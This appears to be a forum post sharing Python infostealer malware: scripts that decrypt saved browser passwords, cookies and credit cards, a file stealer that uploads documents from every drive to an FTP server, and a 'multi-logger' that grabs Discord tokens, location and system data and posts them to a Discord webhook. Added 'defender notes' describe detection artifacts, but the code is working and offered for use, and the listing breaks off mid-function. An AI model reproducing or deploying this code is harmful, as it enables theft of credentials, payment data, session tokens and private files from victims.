    """Write *content* to ``<browser_name>/<data_type>.txt`` relative to the working directory.

    Creates the ``<browser_name>`` directory if needed. When *content* is
    None only a "No Data Found" line is printed.

    Defender note: the output is plaintext on disk, so directories named
    after browsers that contain files such as ``Saved_Passwords.txt`` (the
    names come from the callers at the bottom of the file) are a host
    artifact to hunt for.
    """
    if not os.path.exists(browser_name):
        os.mkdir(browser_name)
    if content is not None:
        open(f'{browser_name}/{data_type}.txt', 'w').write(content)
        # The message reads the module-level name `browser`, not the parameter.
        print(f"\t [*] Saved in {browser}/{data_type}.txt")
    else:
        print(f"\t [-] No Data Found!")


def get_login_data(path: str, profile: str, master_key):
    """Return the saved logins of one browser profile as formatted text.

    Args:
        path: browser "User Data" directory.
        profile: profile directory name beneath *path*.
        master_key: key used by ``decrypt_password``.

    Returns None when ``<path>\\<profile>\\Login Data`` does not exist,
    otherwise a string with one URL / Email / Password entry per row of the
    ``logins`` table.

    Defender notes: the database is copied to a file named ``login_db`` in
    the working directory and queried there, so the observable events are a
    non-browser read of ``Login Data`` and the short-lived ``login_db``
    file. The copy is removed only if every row decrypts without raising.
    """
    login_db = f'{path}\\{profile}\\Login Data'
    if not os.path.exists(login_db):
        return
    result = ""
    shutil.copy(login_db, 'login_db')
    conn = sqlite3.connect('login_db')
    cursor = conn.cursor()
    cursor.execute('SELECT action_url, username_value, password_value FROM logins')
    for row in cursor.fetchall():
        password = decrypt_password(row[2], master_key)
        result += f"""
        URL: {row[0]}
        Email: {row[1]}
        Password: {password}
     
        """
    conn.close()
    os.remove('login_db')
    return result


def get_credit_cards(path: str, profile: str, master_key):
    """Return the saved payment cards of one browser profile as formatted text.

    Args:
        path: browser "User Data" directory.
        profile: profile directory name beneath *path*.
        master_key: key used by ``decrypt_password``.

    Returns None when ``<path>\\<profile>\\Web Data`` does not exist. Rows of
    the ``credit_cards`` table with an empty name, month, year or encrypted
    number are skipped.

    Defender notes: the database is copied to ``cards_db`` in the working
    directory before being queried; a non-browser read of ``Web Data`` plus
    that transient file are the host signals. Users who do not store cards
    in the browser have nothing in this table to lose.
    """
    cards_db = f'{path}\\{profile}\\Web Data'
    if not os.path.exists(cards_db):
        return

    result = ""
    shutil.copy(cards_db, 'cards_db')
    conn = sqlite3.connect('cards_db')
    cursor = conn.cursor()
    cursor.execute(
        'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards')
    for row in cursor.fetchall():
        if not row[0] or not row[1] or not row[2] or not row[3]:
            continue

        card_number = decrypt_password(row[3], master_key)
        result += f"""
        Name On Card: {row[0]}
        Card Number: {card_number}
        Expires On:  {row[1]} / {row[2]}
        Added On: {datetime.fromtimestamp(row[4])}
     
        """

    conn.close()
    os.remove('cards_db')
    return result


def get_cookies(path: str, profile: str, master_key):
    """Return the cookies of one browser profile as formatted text.

    Args:
        path: browser "User Data" directory.
        profile: profile directory name beneath *path*.
        master_key: key used by ``decrypt_password``.

    Returns None when ``<path>\\<profile>\\Network\\Cookies`` does not exist.
    Rows with an empty host, name, path or encrypted value are skipped.

    Defender notes: the database is copied to ``cookie_db`` in the working
    directory before being queried. Decrypted cookies include live session
    identifiers, so incident response for this kind of access should
    include revoking active sessions, not only changing passwords.
    """
    cookie_db = f'{path}\\{profile}\\Network\\Cookies'
    if not os.path.exists(cookie_db):
        return
    result = ""
    shutil.copy(cookie_db, 'cookie_db')
    conn = sqlite3.connect('cookie_db')
    cursor = conn.cursor()
    cursor.execute('SELECT host_key, name, path, encrypted_value,expires_utc FROM cookies')
    for row in cursor.fetchall():
        if not row[0] or not row[1] or not row[2] or not row[3]:
            continue

        cookie = decrypt_password(row[3], master_key)

        result += f"""
        Host Key : {row[0]}
        Cookie Name : {row[1]}
        Path: {row[2]}
        Cookie: {cookie}
        Expires On: {row[4]}
     
        """

    conn.close()
    os.remove('cookie_db')
    return result


def get_web_history(path: str, profile: str):
    """Return the browsing history of one browser profile as formatted text.

    Args:
        path: browser "User Data" directory.
        profile: profile directory name beneath *path*.

    Returns None when ``<path>\\<profile>\\History`` does not exist. Rows of
    the ``urls`` table with an empty url, title or visit time are skipped.
    No decryption is involved; the table is read as stored.

    Defender note: the database is copied to ``web_history_db`` in the
    working directory before being queried.
    """
    web_history_db = f'{path}\\{profile}\\History'
    result = ""
    if not os.path.exists(web_history_db):
        return

    shutil.copy(web_history_db, 'web_history_db')
    conn = sqlite3.connect('web_history_db')
    cursor = conn.cursor()
    cursor.execute('SELECT url, title, last_visit_time FROM urls')
    for row in cursor.fetchall():
        if not row[0] or not row[1] or not row[2]:
            continue
        result += f"""
        URL: {row[0]}
        Title: {row[1]}
        Visited Time: {row[2]}
     
        """
    conn.close()
    os.remove('web_history_db')
    return result


def get_downloads(path: str, profile: str):
    """Read the download records of one browser profile.

    Args:
        path: browser "User Data" directory.
        profile: profile directory name beneath *path*.

    Queries ``tab_url`` and ``target_path`` from the ``downloads`` table of
    ``<path>\\<profile>\\History``, skipping rows where either is empty.

    Defender note: the database is copied to ``downloads_db`` in the working
    directory before being queried, and that copy is removed at the end.
    """
    downloads_db = f'{path}\\{profile}\\History'
    if not os.path.exists(downloads_db):
        return
    result = ""
    shutil.copy(downloads_db, 'downloads_db')
    conn = sqlite3.connect('downloads_db')
    cursor = conn.cursor()
    cursor.execute('SELECT tab_url, target_path FROM downloads')
    for row in cursor.fetchall():
        if not row[0] or not row[1]:
            continue
        result += f"""
        Download URL: {row[0]}
        Local Path: {row[1]}
     
        """

    conn.close()
    os.remove('downloads_db')


def installed_browsers():
    """Return the keys of the module-level ``browsers`` table whose "User Data" path exists.

    Defender note: this is a burst of existence checks across many browser
    profile directories from one process, which can serve as a weak signal
    when correlated with later reads of ``Local State`` or ``Login Data``.
    """
    results = []
    for browser, path in browsers.items():
        if os.path.exists(path):
            results.append(browser)
    return results


# Entry point. For every detected browser only the "Default" profile is processed, and each result is
# written as plaintext under a directory named after the browser. The visible code of this script has
# no upload step: its output stays on local disk, which is where an investigation would find it.
if __name__ == '__main__':
    available_browsers = installed_browsers()

    for browser in available_browsers:
        browser_path = browsers[browser]
        master_key = get_master_key(browser_path)
        print(f"Getting Stored Details from {browser}")

        print("\t [!] Getting Saved Passwords")
        save_results(browser, 'Saved_Passwords', get_login_data(browser_path, "Default", master_key))
        print("\t------\n")

        print("\t [!] Getting Browser History")
        save_results(browser, 'Browser_History', get_web_history(browser_path, "Default"))
        print("\t------\n")

        print("\t [!] Getting Download History")
        save_results(browser, 'Download_History', get_downloads(browser_path, "Default"))
        print("\t------\n")

        print("\t [!] Getting Cookies")
        save_results(browser, 'Browser_Cookies', get_cookies(browser_path, "Default", master_key))
        print("\t------\n")

        print("\t [!] Getting Saved Credit Cards")
        save_results(browser, 'Saved_Credit_Cards', get_credit_cards(browser_path, "Default", master_key))

file_stealer.py


Python:
"""
Steal Files on Victims Machine and send to FTP Server
pip install pywin32

Замените на свой FTP сервер -> with ftplib.FTP("FTPSERVER", "USERNAME", "PASSWORD") as ftp_connection:
"""

import sys
import os
import ftplib
from threading import Thread
from time import sleep
import string
import random
import win32api


def get_all_drivers():
    """Return the logical drive strings reported by win32api, minus the system drive.

    On ``win32``/``cygwin`` the NUL-separated drive list is split and any
    entry containing ``SYSTEMDRIVE`` is removed. Any exception ends the
    process through ``sys.exit()``.

    Defender note: the result covers every other mounted volume, which
    includes removable media and mapped network shares if the OS reports
    them as logical drives, so exposure is not limited to the local disk.
    """
    try:
        if sys.platform in ("win32", "cygwin"):
            drives = win32api.GetLogicalDriveStrings()
            drives = drives.split("\000")[:-1]
            win_drive = os.environ["SYSTEMDRIVE"]

            # Remove SystemDrive
            for key, value in enumerate(drives):
                if win_drive in value:
                    del drives[key]

        return drives
    except Exception:
        sys.exit()


def discover_files(startpath):
    """Yield absolute paths of files under *startpath* that match the extension list.

    A file is yielded when the text after its last dot is in ``extensions``
    (images, video, office documents, text, databases, source files and
    archives) and its size is at most 10485760 bytes.

    Defender note: on the host this is a recursive directory walk with a
    ``stat`` on every matching file, i.e. a high volume of metadata reads
    across user data by one process, followed by reads of the selected
    files in the caller.
    """
    extensions = [
        "jpg",
        "jpeg",
        "bmp",
        "gif",
        "png",
        "svg",
        "psd",
        "raw",
        "avi",
        "flv",
        "m4v",
        "mkv",
        "mov",
        "mpg",
        "mpeg",
        "wmv",
        "swf",
        "3gp",
        "doc",
        "docx",
        "xls",
        "xlsx",
        "ppt",
        "pptx",
        "odt",
        "odp",
        "ods",
        "txt",
        "rtf",
        "tex",
        "pdf",
        "epub",
        "md",
        "csv",
        "db",
        "sql",
        "dbf",
        "mdb",
        "go",
        "py",
        "pyc",
        "zip",
        "tar",
        "tgz",
        "bz2",
        "7z",
        "rar",
        "bak",
    ]

    for dirpath, dirs, files in os.walk(startpath):
        for i in files:
            absolute_path = os.path.abspath(os.path.join(dirpath, i))
            ext = absolute_path.split(".")[-1]
            if ext in extensions:
                # Only get Files that are not bigger than 10MB
                if os.stat(absolute_path).st_size <= 10485760:
                    yield absolute_path


def upload_file(file):
    """Upload one file to the FTP server named in the ``ftplib.FTP`` call.

    Args:
        file: local path of the file to send.

    Sleeps one second, then stores the file under its base name, or under
    that name prefixed with three random alphanumeric characters when the
    server's listing already contains the base name. Every exception is
    swallowed.

    Defender notes: the transfer uses plain FTP, so the login and the file
    contents cross the network unencrypted and are visible to network
    monitoring. Workstations rarely need outbound FTP; blocking it at the
    egress firewall, or alerting on it, covers this channel. The server
    name and credentials in this listing are placeholders.
    """
    sleep(1)
    output_string = "".join(
        random.SystemRandom().choice(string.ascii_letters + string.digits)
        for _ in range(3))
    try:
        with open(file, "rb") as filedata:
            with ftplib.FTP("FTPSERVER", "USERNAME", "PASSWORD") as ftp_connection:
                # Change Directory in FTP Server
                #ftp_connection.cwd("files")
                if file.split("\\")[-1] not in ftp_connection.nlst():
                    ftp_connection.storbinary("STOR " + file.split("\\")[-1], filedata)
                else:
                    ftp_connection.storbinary(
                        "STOR " + output_string + file.split("\\")[-1], filedata)
    except Exception:
        pass


def get_desktop_path():
    """Return ``<home>/Desktop`` for the current user on ``win32``/``cygwin``.

    Any exception, including the unbound ``desktop`` name on other
    platforms, ends the process through ``sys.exit()``.
    """
    try:
        if sys.platform in ("win32", "cygwin"):
            desktop = os.path.join(os.path.expanduser("~"), "Desktop")

        return desktop
    except Exception:
        sys.exit()


def main():
    """Walk the user's Desktop, then every non-system drive, passing each matching file to ``upload_file``.

    Defender note: the order of collection is the Desktop first and the
    remaining volumes afterwards, with one FTP session opened per file by
    ``upload_file``; a long series of short FTP sessions from a single
    workstation is the network-side pattern.
    """
    # Specify custom Path => Desktop
    for file in discover_files(get_desktop_path()):
        desktop_thread = Thread(target=upload_file(file), args=(file,))
        desktop_thread.start()

    # Get all Drivers except SystemDrive
    for drive in get_all_drivers():
        for file in discover_files(drive):
            driver_thread = Thread(target=upload_file(file), args=(file,))
            driver_thread.start()

# Runs the collection only when the file is executed as a script, not when it is imported.
if __name__ == "__main__":
    main()

pywin32 работает только на винде.


Browser Password Stealer​

sudo apt install python3 && python3-pip
pip3 install pypiwin32 pycryptodome win32crypt Crypto shutil
python Brave.py


Brave.py​

Python:
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import datetime



# Constants used only by ConvertDate below. They look like the 1601-to-1970 epoch offset in
# 100-nanosecond ticks and the number of such ticks per second; the listing does not say so.
FileName = 116444736000000000
NanoSeconds = 10000000


def ConvertDate(ft):
    """Format a browser timestamp as ``YYYY-MM-DD HH:MM:SS`` (UTC).

    *ft* is converted with ``int``, multiplied by ten, reduced by the
    module-level ``FileName`` constant and divided by ``NanoSeconds`` to
    obtain seconds for ``datetime.utcfromtimestamp``.
    """
    utc = datetime.utcfromtimestamp(((10 * int(ft)) - FileName) / NanoSeconds)
    return utc.strftime('%Y-%m-%d %H:%M:%S')


def get_master_key():
    '''
    Return the unwrapped ``os_crypt`` key of the Brave profile of the current user.

    Reads ``AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State``
    under USERPROFILE; if that fails for any reason the process exits. The
    ``os_crypt.encrypted_key`` value is base64-decoded, its first five bytes
    are dropped and the rest is passed to ``win32crypt.CryptUnprotectData``.

    Defender notes: a non-browser process reading ``Local State`` followed by
    a DPAPI unprotect call is the observable sequence. The unwrap succeeds
    only in the logon context of the user who owns the profile.
    '''
    try:
     with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State',
              "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    except:
        exit()
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key


def decrypt_payload(cipher, payload):
    """Return ``cipher.decrypt(payload)``; no authentication-tag verification is performed here."""
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    """Return an AES cipher object in GCM mode built from *aes_key*, with *iv* as the third argument."""
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    '''
    Decrypt one stored value with AES-GCM and return it as text.

    Bytes 3..14 of *buff* are used as the IV and everything from byte 15 on
    as the ciphertext; the last 16 bytes of the decrypted output are dropped
    before decoding. Any exception is converted into the literal string
    "Chrome < 80", so callers cannot tell a failed decryption from an old
    storage format.
    '''
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()
        return decrypted_pass
    except Exception as e:
        return "Chrome < 80"


def get_password():
    """Print the saved logins of the Brave default profile to stdout.

    Copies ``User Data\\default\\Login Data`` to ``Loginvault.db`` in the
    working directory, reads the ``logins`` table, decrypts each password
    and prints URL, user name and password for rows where either the user
    name or the decrypted password is non-empty.

    Defender notes: host artifacts are a non-browser read of ``Login Data``
    and the transient ``Loginvault.db`` file. Output goes to stdout only;
    this function contains no network code.
    """
    master_key = get_master_key()
    login_db = os.environ[
                   'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Login Data'
    try:
        shutil.copy2(login_db,
                     "Loginvault.db")
    except:
        print("[*] Brave Browser Not Installed !!")
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            if username != "" or decrypted_password != "":
                print(
                    "URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 10 + "\n")
    except Exception as e:
        pass

    cursor.close()
    conn.close()
    # Best-effort removal of the working copy; on failure Loginvault.db stays behind as an artifact.
    try:
        os.remove("Loginvault.db")
    except Exception as e:
        pass


def get_credit_cards():
    master_key = get_master_key()
    login_db = os.environ[
                   'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Web Data'
    try:
        shutil.copy2(login_db,
                     "CCvault.db")
                   
    except:
        print("[*] Brave Browser Not Installed !!")
    conn = sqlite3.connect("CCvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT * FROM credit_cards")
        for r in cursor.fetchall():
            username = r[1]
            encrypted_password = r[4]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            expire_mon = r[2]
            expire_year = r[3]
            print(
                "Name in Card: " + username + "\nNumber: " + decrypted_password + "\nExpire Month: " + str(
                    expire_mon) + "\nExpire Year: " + str(expire_year) + "\n" + "*" * 10 + "\n")

    except Exception as e:
        pass

    cursor.close()
    conn.close()
    try:
        os.remove("CCvault.db")
    except Exception as e:
        pass


def get_bookmarks():
    bookmarks_location = os.environ[
                             'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Bookmarks'
    with open(bookmarks_location) as f:
        data = json.load(f)
        bookmarks_list = data["roots"]["bookmark_bar"]["children"]
       
        for i in range(len(bookmarks_list)):
            print(f"Name: {bookmarks_list[i]['name']}\n"
            f"Added on: {ConvertDate(bookmarks_list[i]['date_added'])}\n")


while True:

        get_password()
        get_credit_cards()
        get_bookmarks()

Multi-logger​


sudo apt install python3 && python3-pip
pip3 install dhooks pycryptodome requests psutil browser_cookie3 cryptography


multi-logger.py​


Python:
import psutil
import platform
import json
from datetime import datetime
from time import sleep
import requests
import socket
from requests import get
import os
import re
import requests
import subprocess
from uuid import getnode as get_mac
import browser_cookie3 as steal, requests, base64, random, string, zipfile, shutil, dhooks, os, re, sys, sqlite3
from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes)
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.backends import default_backend
from Crypto.Cipher import AES


from base64 import b64decode, b64encode
from dhooks import Webhook, Embed, File
from subprocess import Popen, PIPE
from json import loads, dumps
from shutil import copyfile
from sys import argv

# CONFIG -> Setup before compiling
url= "" #Paste Discord Webhook url




# Scaling from bytes to KB,MB,GB, etc
def scale(bytes, suffix="B"):
    defined = 1024
    for unit in ["", "K", "M", "G", "T", "P"]:
        if bytes < defined:
            return f"{bytes:.2f}{unit}{suffix}"
        bytes /= defined

uname = platform.uname()

bt = datetime.fromtimestamp(psutil.boot_time()) # Boot time

host = socket.gethostname()
localip = socket.gethostbyname(host)

publicip = get('https://api.ipify.org').text # Get public API
city = get(f'https://ipapi.co/{publicip}/city').text
region = get(f'https://ipapi.co/{publicip}/region').text
postal = get(f'https://ipapi.co/{publicip}/postal').text
timezone = get(f'https://ipapi.co/{publicip}/timezone').text
currency = get(f'https://ipapi.co/{publicip}/currency').text
country = get(f'https://ipapi.co/{publicip}/country_name').text
callcode = get(f"https://ipapi.co/{publicip}/country_calling_code").text
vpn = requests.get('http://ip-api.com/json?fields=proxy')
proxy = vpn.json()['proxy']
mac = get_mac()


roaming = os.getenv('AppData')
## Output for txt file location
output = open(roaming + "temp.txt", "a")


## Discord Locations
Directories = {
        'Discord': roaming + '\\Discord',
        'Discord Two': roaming + '\\discord',
        'Discord Canary': roaming + '\\Discordcanary',
        'Discord Canary Two': roaming + '\\discordcanary',
        'Discord PTB': roaming + '\\discordptb',
        'Google Chrome': roaming + '\\Google\\Chrome\\User Data\\Default',
        'Opera': roaming + '\\Opera Software\\Opera Stable',
        'Brave': roaming + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
        'Yandex': roaming + '\\Yandex\\YandexBrowser\\User Data\\Default',
}


## Scan for the regex [\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}
def Yoink(Directory):
    """Collect regex matches from an application's Local Storage LevelDB files.

    Appends '\\Local Storage\\leveldb' to Directory, reads every '.log' and
    '.ldb' file there as text (decode errors ignored) and returns every
    substring matching either of the two patterns below.

    Detection: the observable is a process other than the owning client or
    browser enumerating and opening files under '<profile>\\Local Storage\\leveldb'.
    File-access auditing on those directories, or an EDR rule on reads by
    unsigned / script-host processes, covers this step.
    """
    Directory += '\\Local Storage\\leveldb'

    Tokens = []

    for FileName in os.listdir(Directory):
        # Only LevelDB write-ahead logs and table files are inspected.
        if not FileName.endswith('.log') and not FileName.endswith('.ldb'):
            continue

        for line in [x.strip() for x in open(f'{Directory}\\{FileName}', errors='ignore').readlines() if x.strip()]:
            # Two fixed shapes: a three-part dotted string (24.6.27 chars) and an 'mfa.'-prefixed one.
            # These literal patterns are usable as static signatures for this family of scripts.
            for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                for Token in re.findall(regex, line):
                    Tokens.append(Token)

    return Tokens


## Wipe the temp file
def Wipe():
    if os.path.exists(roaming + "temp.txt"):
      output2 = open(roaming + "temp.txt", "w")
      output2.write("")
      output2.close()
    else:
      pass


## Search Directorys for Token regex if exists
for Discord, Directory in Directories.items():
    if os.path.exists(Directory):
        Tokens = Yoink(Directory)
    if len(Tokens) > 0:
        for Token in Tokens:
            realshit = f"{Token}\n"


cpufreq = psutil.cpu_freq()
svmem = psutil.virtual_memory()
partitions = psutil.disk_partitions()
disk_io = psutil.disk_io_counters()
net_io = psutil.net_io_counters()

partitions = psutil.disk_partitions()
for partition in partitions:
    try:
        partition_usage = psutil.disk_usage(partition.mountpoint)
    except PermissionError:
        continue





requests.post(url, data=json.dumps({ "embeds": [ { "title": f"Someone Runs Program! - {host}", "color": 8781568 }, { "color": 7506394, "fields": [ { "name": "GeoLocation", "value": f"Using VPN?: {proxy}\nLocal IP: {localip}\nPublic IP: {publicip}\nMAC Adress: {mac}\n\nCountry: {country} | {callcode} | {timezone}\nregion: {region}\nCity: {city} | {postal}\nCurrency: {currency}\n\n\n\n" } ] }, { "fields": [ { "name": "System Information", "value": f"System: {uname.system}\nNode: {uname.node}\nMachine: {uname.machine}\nProcessor: {uname.processor}\n\nBoot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}" } ] }, { "color": 15109662, "fields": [ { "name": "CPU Information", "value": f"Psychical cores: {psutil.cpu_count(logical=False)}\nTotal Cores: {psutil.cpu_count(logical=True)}\n\nMax Frequency: {cpufreq.max:.2f}Mhz\nMin Frequency: {cpufreq.min:.2f}Mhz\n\nTotal CPU usage: {psutil.cpu_percent()}\n" }, { "name": "Nemory Information", "value": f"Total: {scale(svmem.total)}\nAvailable: {scale(svmem.available)}\nUsed: {scale(svmem.used)}\nPercentage: {svmem.percent}%" }, { "name": "Disk Information", "value": f"Total Size: {scale(partition_usage.total)}\nUsed: {scale(partition_usage.used)}\nFree: {scale(partition_usage.free)}\nPercentage: {partition_usage.percent}%\n\nTotal read: {scale(disk_io.read_bytes)}\nTotal write: {scale(disk_io.write_bytes)}" }, { "name": "Network Information", "value": f"Total Sent: {scale(net_io.bytes_sent)}\")\nTotal Received: {scale(net_io.bytes_recv)}" } ] }, { "color": 7440378, "fields": [ { "name": "Discord information", "value": f"Token: {realshit}" } ] } ] }), headers={"Content-Type": "application/json"})

DBP = r'Google\Chrome\User Data\Default\Login Data'
ADP = os.environ['LOCALAPPDATA']


def sniff(path):
    path += '\\Local Storage\\leveldb'

    tokens = []
    try:
        for file_name in os.listdir(path):
            if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
                continue

            for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
                for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                    for token in re.findall(regex, line):
                        tokens.append(token)
        return tokens
    except:
        pass


def encrypt(cipher, plaintext, nonce):
    cipher.mode = modes.GCM(nonce)
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(plaintext)
    return (cipher, ciphertext, nonce)


def decrypt(cipher, ciphertext, nonce):
    cipher.mode = modes.GCM(nonce)
    decryptor = cipher.decryptor()
    return decryptor.update(ciphertext)


def rcipher(key):
    cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
    return cipher


def dpapi(encrypted):
    """Unprotect a DPAPI blob by calling crypt32!CryptUnprotectData through ctypes.

    Args:
        encrypted: the protected bytes.

    Returns:
        The unprotected bytes copied out of the output blob.

    Raises:
        OSError: via ctypes.WinError() when the API call reports failure.

    Detection: because the call goes through ctypes rather than a named
    wrapper module, import-based static checks miss it; the literal
    'CryptUnprotectData' string and the crypt32 load are the static markers,
    and API-level telemetry (a script interpreter calling CryptUnprotectData
    shortly after reading a browser 'Local State' or 'Login Data' file) is the
    behavioural one.
    """
    import ctypes
    import ctypes.wintypes

    # Mirrors the Win32 DATA_BLOB layout: byte count followed by a pointer to the data.
    class DATA_BLOB(ctypes.Structure):
        _fields_ = [('cbData', ctypes.wintypes.DWORD),
                    ('pbData', ctypes.POINTER(ctypes.c_char))]

    p = ctypes.create_string_buffer(encrypted, len(encrypted))
    blobin = DATA_BLOB(ctypes.sizeof(p), p)
    blobout = DATA_BLOB()
    # No description, entropy, prompt struct or flags are supplied (all None / 0).
    retval = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
    if not retval:
        raise ctypes.WinError()
    result = ctypes.string_at(blobout.pbData, blobout.cbData)
    # The output buffer is released with LocalFree after its contents are copied.
    ctypes.windll.kernel32.LocalFree(blobout.pbData)
    return result


def localdata():
    jsn = None
    with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode="r") as f:
        jsn = json.loads(str(f.readline()))
    return jsn["os_crypt"]["encrypted_key"]


def decryptions(encrypted_txt):
    encoded_key = localdata()
    encrypted_key = base64.b64decode(encoded_key.encode())
    encrypted_key = encrypted_key[5:]
    key = dpapi(encrypted_key)
    nonce = encrypted_txt[3:15]
    cipher = rcipher(key)
    return decrypt(cipher, encrypted_txt[15:], nonce)


class chrome:
    """Reads saved logins from the Chrome 'Login Data' SQLite store of the current user.

    Artifacts visible in this class (useful as host indicators):
      * a copy of 'Login Data' written to %LOCALAPPDATA%\\sqlite_file, deleted after use;
      * plaintext output written to C:\\ProgramData\\passwords.txt.

    Detection: alert on any non-browser process copying or opening
    'User Data\\Default\\Login Data', and on creation of the two paths above.
    Mitigation: the store is only as strong as the user session; keeping
    credentials in a manager that is not unlocked by the OS logon alone, and
    blocking unsigned script/packed-Python execution, reduce exposure.
    """

    def __init__(self):
        # Formatted result strings accumulated by pwsd() and written out by saved().
        self.passwordList = []

    def chromedb(self):
        """Copy the live 'Login Data' file to a scratch path and hand it to pwsd()."""
        _full_path = os.path.join(ADP, DBP)
        _temp_path = os.path.join(ADP, 'sqlite_file')
        # Any scratch file left by an earlier run is removed before copying.
        if os.path.exists(_temp_path):
            os.remove(_temp_path)
        shutil.copyfile(_full_path, _temp_path)
        self.pwsd(_temp_path)
    def pwsd(self, db_file):
        """Query the 'logins' table of db_file, decrypt each value, then delete db_file."""
        conn = sqlite3.connect(db_file)
        _sql = 'select signon_realm,username_value,password_value from logins'
        for row in conn.execute(_sql):
            host = row[0]
            # Rows whose signon_realm starts with 'android' are skipped.
            if host.startswith('android'):
                continue
            name = row[1]
            value = self.cdecrypt(row[2])
            _info = '[==================]\nhostname => : %s\nlogin => : %s\nvalue => : %s\n[==================]\n\n' % (host, name, value)
            self.passwordList.append(_info)
        conn.close()
        # The scratch copy is removed, so the file exists on disk only briefly.
        os.remove(db_file)

    def cdecrypt(self, encrypted_txt):
        """Decrypt one stored value on win32; returns None on WindowsError or on other platforms.

        Two blob shapes are recognised by prefix: b'\\x01\\x00\\x00\\x00' is passed
        straight to dpapi(); b'v10' goes through decryptions() and the last 16
        bytes of the result are dropped before decoding.
        """
        if sys.platform == 'win32':
            try:
                if encrypted_txt[:4] == b'\x01\x00\x00\x00':
                    decrypted_txt = dpapi(encrypted_txt)
                    return decrypted_txt.decode()
                elif encrypted_txt[:3] == b'v10':
                    decrypted_txt = decryptions(encrypted_txt)
                    return decrypted_txt[:-16].decode()
            except WindowsError:
                return None
        else:
            pass

    def saved(self):
        """Write the accumulated strings to C:\\ProgramData\\passwords.txt (UTF-8, overwrite)."""
        try:
            # ProgramData is world-readable by default, so this plaintext file is also
            # exposed to every other local account while it exists.
            with open(r'C:\ProgramData\passwords.txt', 'w', encoding='utf-8') as f:
                f.writelines(self.passwordList)
        except WindowsError:
            return None


if __name__ == "__main__":
    main = chrome()
    try:
        main.chromedb()
    except:
        pass
    main.saved()


# webhook functionality => collect rest of specified data, send it to our webhook


def beamed():
    """Collection-and-exfiltration stage of the script; annotated here for analysts.

    Observable behaviour, in order: an outbound request to api.ipify.org,
    reads of several application profile directories, staging files under
    C:\\ProgramData, two 'wmic' child processes, browser cookie-store reads via
    the browser_cookie3 module (imported as 'steal'), one webhook upload, and
    'del' commands against the staged files.

    Detection summary: the ProgramData file names, the wmic command lines and
    the ipify lookup immediately followed by a webhook POST are each stable
    indicators; together they form a high-confidence behavioural chain even
    when the script is repacked.
    """
    hook = Webhook(url)
    # Network indicator: external-IP lookup from a non-browser process.
    try:
        hostname = requests.get("https://api.ipify.org").text
    except:
        pass


    local = os.getenv('LOCALAPPDATA')
    roaming = os.getenv('APPDATA')
    # Profile directories that are probed; each existing one is passed to sniff().
    paths = {
        'Discord': roaming + '\\Discord',
        'Discord Canary': roaming + '\\discordcanary',
        'Discord PTB': roaming + '\\discordptb',
        'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
        'Opera': roaming + '\\Opera Software\\Opera Stable',
        'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
        'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
    }

    message = '\n'
    for platform, path in paths.items():
        if not os.path.exists(path):
            continue

        message += '```'

        tokens = sniff(path)

        if len(tokens) > 0:
            for token in tokens:
                message += f'{token}\n'
        else:
            pass

        message += '```'
    

    """screenshot victim's desktop"""
    # Host indicator: screenshot.jpg created under the ProgramData directory.
    try:
        screenshot = image.grab()
        screenshot.save(os.getenv('ProgramData') +r'\screenshot.jpg')
        screenshot = open(r'C:\ProgramData\screenshot.jpg', 'rb')
        screenshot.close()
    except:
        pass

    """gather our .zip variables"""
    # Host indicator: passwords.zip created next to passwords.txt in C:\ProgramData.
    try:
        zname = r'C:\ProgramData\passwords.zip'
        newzip = zipfile.ZipFile(zname, 'w')
        newzip.write(r'C:\ProgramData\passwords.txt')
        newzip.close()
        passwords = File(r'C:\ProgramData\passwords.zip')
    except:
        pass
    
    """gather our windows product key variables"""
    # Process indicator: wmic spawned by a Python/packed process with these exact
    # command lines; process-creation logging with command-line capture records both.
    try:
        usr = os.getenv("UserName")
